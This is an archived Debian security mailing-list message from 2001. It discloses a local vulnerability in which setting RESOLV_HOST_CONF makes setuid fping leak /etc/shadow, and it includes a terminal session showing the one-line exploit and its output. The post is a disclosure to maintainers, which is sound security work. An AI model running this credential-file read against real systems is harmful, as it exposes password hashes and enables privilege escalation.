Re: 'export RESOLV_HOST_CONF= any file you want' local vulnerability

To: <security@debian.org>, <debian-security@lists.debian.org>
Subject: Re: 'export RESOLV_HOST_CONF= any file you want' local vulnerability
From: thomas lakofski <thomas@88.net>
Date: Mon, 8 Jan 2001 17:57:23 +0000 (GMT)
Message-id: <[🔎] Pine.LNX.4.31.0101081752230.25739-100000@io.88.net>
In-reply-to: <[🔎] Pine.LNX.4.31.0101081331280.20955-100000@io.88.net>

Since I've not had any response yet, I thought I'd give a demonstration of how
nasty this is:

  Script started on Mon Jan  8 17:48:23 2001
  thomas@io:~$ export RESOLV_HOST_CONF=/etc/shadow
  thomas@io:~$ ping localhost
  PING localhost (127.0.0.1): 56 data bytes

  --- localhost ping statistics ---
  2 packets transmitted, 0 packets received, 100% packet loss
  thomas@io:~$ fping localhost
  /etc/shadow: line 1: bad command `root:<censored>:11063:0:99999:7:::'

  [snip]

  /etc/shadow: line 73: bad command `gdm:!:11285:0:99999:7:::'
  localhost is unreachable
  thomas@io:~$ ls -l `which fping`
  -rwsr-xr-x    1 root     root        19728 May 15  2000 /usr/bin/fping
  thomas@io:~$ ls -l `which ping`
  -rwsr-xr-x    1 root     root        15036 Dec 31 04:11 /bin/ping
  thomas@io:~$ ldd `which fping`
    	libc.so.6 => /lib/libc.so.6 (0x40021000)
    	/lib/ld-linux.so.2 => /lib/ld-linux.so.2 (0x40000000)
  thomas@io:~$ ldd `which ping`
    	libc.so.6 => /lib/libc.so.6 (0x40021000)
    	/lib/ld-linux.so.2 => /lib/ld-linux.so.2 (0x40000000)
  thomas@io:~$ exit

  Script done on Mon Jan  8 17:49:42 2001

It seems to work for some setuid programs, but not others.  I'm running the
most recent packages from unstable as of today:

ii  libc6          2.2-9          GNU C Library: Shared libraries and Timezone
ii  netkit-ping    0.10-5         The ping utility from netkit
ii  fping          2.2b1-2        Send ICMP ECHO_REQUEST packets to network ho

cheers,

Thomas


On Mon, 8 Jan 2001, thomas lakofski wrote:

> From: thomas lakofski <thomas@88.net>
> To: security@debian.org, debian-security@lists.debian.org
> Date: Mon, 8 Jan 2001 13:34:52 +0000 (GMT)
> Subject: 'export RESOLV_HOST_CONF= any file you want' local vulnerability
>
> Hi,
>
> A friend of mine just tried this against my unstable box and successfully
> obtained the contents of /etc/shadow.
>
> I imagine that this is a problem in libc -- I'll leave it to
> security@debian.org to file bug reports.
>
> cheers,
>
> Thomas
>
>

-- 
          who's watching your watchmen?
gpg: pub 1024D/81FD4B43 sub 4096g/BB6D2B11=>p.nu/d
2B72 53DB 8104 2041 BDB4  F053 4AE5 01DF 81FD 4B43

Reply to:

Follow-Ups:
- Re[2]: 'export RESOLV_HOST_CONF= any file you want' local vulnerability
  - From: Kevin <cog@iwz.com>
- Re: 'export RESOLV_HOST_CONF= any file you want' local vulnerability
  - From: Wichert Akkerman <wichert@cistron.nl>
- Re: 'export RESOLV_HOST_CONF= any file you want' local vulnerabi
  - From: bjoern.engels@lanworks.de
- Re: 'export RESOLV_HOST_CONF= any file you want' local vulnerability
  - From: Julian Gilbey <J.D.Gilbey@qmw.ac.uk>

References:
- 'export RESOLV_HOST_CONF= any file you want' local vulnerability
  - From: thomas lakofski <thomas@88.net>

Prev by Date: IP spoofing protection
Next by Date: Re[2]: 'export RESOLV_HOST_CONF= any file you want' local vulnerability
Previous by thread: 'export RESOLV_HOST_CONF= any file you want' local vulnerability
Next by thread: Re[2]: 'export RESOLV_HOST_CONF= any file you want' local vulnerability
Index(es):
- Date
- Thread